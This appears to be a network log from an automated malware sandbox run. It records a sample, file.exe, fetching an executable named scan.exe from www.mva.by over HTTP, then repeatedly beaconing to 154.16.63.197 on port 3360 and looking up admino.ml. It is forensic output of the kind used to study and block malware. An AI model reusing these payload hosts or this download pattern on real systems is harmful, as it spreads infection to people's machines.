                                              Dec 13, 2024 17:57:35.919437885 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.920494080 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.920537949 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.920613050 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.920649052 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.922449112 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.922461033 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.922489882 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.922528982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.922785044 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.922827959 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.922868013 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.922903061 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.923944950 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.923995972 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.924053907 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.924091101 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.925127983 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.925173044 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.925261974 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.925302029 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.926325083 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.926363945 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.926364899 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.926398039 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.927462101 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.927501917 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.927588940 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.927624941 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.928642988 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.928685904 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.928774118 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.928807020 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.060208082 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.060224056 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.060267925 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.060317993 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.060528040 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.060561895 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.060695887 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.060734034 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.061054945 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.061095953 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.061198950 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.061232090 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.061994076 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.062006950 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.062038898 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.062068939 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.062737942 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.062777042 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.062817097 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.062855959 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.063929081 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.063970089 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.064069033 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.064105034 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.065098047 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.065145969 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.065192938 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.065241098 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.066287994 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.066329956 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.066423893 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.066462040 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.067488909 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.067509890 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.067534924 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.067565918 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.068629026 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.068674088 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.068680048 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.068715096 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.069837093 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.069881916 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.070087910 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.070132017 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.071048975 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.071084023 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.071099043 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.071130037 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.072243929 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.072300911 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.072382927 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.072422981 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.073427916 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.073472023 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.073616028 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.073663950 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.074681997 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.074733973 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.074774981 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.074815989 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.075844049 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.075895071 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.076047897 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.076092005 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.077033043 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.077090025 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.077169895 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.077222109 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.078176975 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.078224897 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.078305960 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.078351021 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.079375029 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.079427004 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.079476118 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.079518080 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.080504894 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.080554962 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.080616951 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.080660105 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.081722021 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.081773043 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.081856012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.081903934 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.082884073 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.082935095 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.083002090 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.083041906 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.084156036 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.084211111 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.084369898 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.084415913 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.085263014 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.085311890 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.085387945 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.085429907 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.086474895 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.086527109 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.086584091 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.086625099 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.087627888 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.087673903 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.087933064 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.087980986 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.088835001 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.088922977 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.088942051 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.088969946 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.089978933 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.090029001 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.090121031 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.090163946 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.091185093 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.091236115 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.091294050 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.091335058 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.092348099 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.092397928 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.092456102 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.092498064 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.093620062 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.093653917 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.093672991 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.093703032 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.094767094 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.094819069 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.094898939 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.094945908 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.095927000 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.095987082 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.096041918 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.096084118 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.097111940 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.097166061 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.097222090 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.097265005 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.098783970 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.098838091 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.098933935 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.098982096 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.099473000 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.099524975 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.099584103 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.099623919 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.100722075 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.100776911 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.100946903 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.101000071 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.101849079 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.101902008 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.101907969 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.101942062 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.103046894 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.103102922 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.103168964 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.103210926 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.104281902 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.104337931 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.104434013 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.104477882 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.105400085 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.105451107 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.105493069 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.105534077 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.106612921 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.106666088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.106667042 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.106734037 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.107820988 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.107880116 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.107964039 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.108006001 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.109006882 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.109061003 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.109142065 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.109189034 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.110188961 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.110246897 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.110346079 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.110397100 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.111366987 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.111419916 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.111421108 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.111460924 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.112541914 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.112592936 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.112693071 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.112739086 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.113737106 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.113794088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.113796949 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.113831997 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119427919 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119472027 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119507074 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119523048 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119540930 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119550943 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119568110 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119580984 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119580984 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119616032 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119620085 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119652987 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119656086 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119687080 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119689941 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119721889 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119728088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119766951 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.119812965 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.119853973 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.120857000 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.120913982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.121006966 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.121052980 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.251672983 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.251746893 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.251827002 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.251866102 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:36.252166986 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:36.252223969 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:38.052309036 CET497053360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:57:38.122534990 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:38.173753977 CET336049705154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:57:38.173839092 CET497053360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:57:38.174794912 CET497053360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:57:38.294711113 CET336049705154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:00.062073946 CET336049705154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:00.062381029 CET497053360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:05.068757057 CET497513360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:05.188782930 CET336049751154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:05.188868046 CET497513360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:05.189475060 CET497513360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:05.310067892 CET336049751154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:27.109210014 CET336049751154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:27.109281063 CET497513360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:32.115509987 CET498153360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:32.235481024 CET336049815154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:32.235654116 CET498153360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:32.236208916 CET498153360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:32.356228113 CET336049815154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:54.142338037 CET336049815154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:54.144011021 CET498153360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:59.272525072 CET498783360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:59.392981052 CET336049878154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:58:59.393063068 CET498783360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:59.393579960 CET498783360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:58:59.513472080 CET336049878154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:21.313380957 CET336049878154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:21.313452005 CET498783360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:26.756294966 CET499423360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:26.876904011 CET336049942154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:26.877001047 CET499423360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:26.877943039 CET499423360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:26.998816967 CET336049942154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:48.814245939 CET336049942154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:48.814383984 CET499423360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:53.850042105 CET499813360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:53.969845057 CET336049981154.16.63.197192.168.2.5
                                              Dec 13, 2024 17:59:53.969922066 CET499813360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:53.972078085 CET499813360192.168.2.5154.16.63.197
                                              Dec 13, 2024 17:59:54.093417883 CET336049981154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:15.877485991 CET336049981154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:15.877598047 CET499813360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:20.897536039 CET499823360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:21.018790960 CET336049982154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:21.020725012 CET499823360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:21.020725012 CET499823360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:21.141593933 CET336049982154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:42.940135956 CET336049982154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:42.940319061 CET499823360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:47.954816103 CET499833360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:48.074760914 CET336049983154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:00:48.078318119 CET499833360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:48.078830004 CET499833360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:00:48.200527906 CET336049983154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:01:09.973051071 CET336049983154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:01:09.973258018 CET499833360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:01:14.975331068 CET499843360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:01:15.095690012 CET336049984154.16.63.197192.168.2.5
                                              Dec 13, 2024 18:01:15.095792055 CET499843360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:01:15.096357107 CET499843360192.168.2.5154.16.63.197
                                              Dec 13, 2024 18:01:15.216562033 CET336049984154.16.63.197192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 13, 2024 17:57:32.279174089 CET5379853192.168.2.51.1.1.1
                                              Dec 13, 2024 17:57:33.066862106 CET53537981.1.1.1192.168.2.5
                                              Dec 13, 2024 17:57:41.729686975 CET5276153192.168.2.51.1.1.1
                                              Dec 13, 2024 17:57:41.978154898 CET53527611.1.1.1192.168.2.5
                                              Dec 13, 2024 17:57:57.190032005 CET5972253192.168.2.51.1.1.1
                                              Dec 13, 2024 17:57:57.330642939 CET53597221.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 13, 2024 17:57:32.279174089 CET192.168.2.51.1.1.10xbfd0Standard query (0)www.mva.byA (IP address)IN (0x0001)false
                                              Dec 13, 2024 17:57:41.729686975 CET192.168.2.51.1.1.10xbddfStandard query (0)admino.mlA (IP address)IN (0x0001)false
                                              Dec 13, 2024 17:57:57.190032005 CET192.168.2.51.1.1.10x60baStandard query (0)admino.mlA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 13, 2024 17:57:33.066862106 CET1.1.1.1192.168.2.50xbfd0No error (0)www.mva.bymva.byCNAME (Canonical name)IN (0x0001)false
                                              Dec 13, 2024 17:57:33.066862106 CET1.1.1.1192.168.2.50xbfd0No error (0)mva.by93.125.99.121A (IP address)IN (0x0001)false
                                              Dec 13, 2024 17:57:41.978154898 CET1.1.1.1192.168.2.50xbddfName error (3)admino.mlnonenoneA (IP address)IN (0x0001)false
                                              Dec 13, 2024 17:57:57.330642939 CET1.1.1.1192.168.2.50x60baName error (3)admino.mlnonenoneA (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.mva.by

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.54970493.125.99.121804084C:\Users\user\Desktop\file.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 13, 2024 17:57:33.290174007 CET282OUTGET /tags/scan.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                              Host: www.mva.by
                                              Connection: Keep-Alive
                                              Dec 13, 2024 17:57:34.496464014 CET1236INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 13 Dec 2024 16:57:34 GMT
                                              Content-Type: application/x-msdownload
                                              Content-Length: 853504
                                              Connection: keep-alive
                                              Last-Modified: Wed, 06 Jun 2018 00:46:15 GMT
                                              Accept-Ranges: bytes
                                              Cache-Control: max-age=259200
                                              Expires: Mon, 16 Dec 2024 16:57:34 GMT
